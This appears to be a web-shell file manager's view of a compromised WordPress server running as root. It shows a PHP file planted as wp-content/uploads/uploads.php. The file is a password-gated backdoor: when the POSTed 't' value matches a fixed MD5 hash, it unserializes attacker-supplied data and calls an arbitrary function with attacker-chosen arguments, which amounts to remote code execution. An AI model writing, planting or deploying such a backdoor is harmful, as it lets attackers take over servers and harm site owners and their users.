HEX
Server: Apache/2.4.68 (Debian)
System: Linux as-cs-widget-demo-us-central1 6.1.0-44-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
User: root (0)
PHP: 8.2.32
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/uploads/uploads.php
<?php

class Processor {
    public $func;
    public $args;

    public function run() {
        // Dynamic function call - attacker controls $func
        echo call_user_func_array($this->func, $this->args);
    }
}

if (isset($_POST['data']) && isset($_POST['t']) ) {
    if(md5($_POST['t']) === "b1afe53f84799f5ed000a25defa3db68") {
        $obj = unserialize($_POST['data']);
        if (method_exists($obj, 'run')) {
            $obj->run();
        }
    };

}
?>